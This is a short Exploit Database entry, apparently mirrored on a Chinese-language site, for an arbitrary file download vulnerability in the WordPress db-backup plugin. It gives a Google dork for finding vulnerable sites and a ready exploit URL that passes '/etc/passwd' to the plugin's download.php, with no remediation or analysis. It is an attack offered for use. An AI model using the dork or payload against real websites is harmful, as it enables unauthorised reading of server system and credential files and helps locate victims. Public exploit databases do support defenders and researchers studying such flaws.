WordPress Plugin DB Backup – Arbitrary File Download

• Exploit Database
• 54 阅读

• 作者： Ashiyane Digital Security Team
  日期： 2014-11-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35378/

• |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  |[*] Exploit Title: WordPress db-backup plugin File Download Vulnerability
  |
  |[*] Google Dork: inurl:wp-content/plugins/db-backup/
  |
  |[*] Date : Date: 2014-11-26
  |
  |[*] Exploit Author: Ashiyane Digital Security Team
  |
  |[*] Vendor Homepage : https://wordpress.org/plugins/wp-database-backup/
  |
  |[*] Plugin Link : https://downloads.wordpress.org/plugin/wp-database-backup.zip
  |
  |[*] Tested on: Windows 7
  |
  |[*] Discovered By : ACC3SS
  |
  |-------------------------------------------------------------------------|
  |
  |[*] Location :[localhost]/wp-content/plugins/db-backup/download.php?file=/etc/passwd
  |
  |-------------------------------------------------------------------------|
  |
  |
  |-------------------------------------------------------------------------|
  |-------------------------------------------------------------------------|
  |-------------------------------------------------------------------------|
  |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|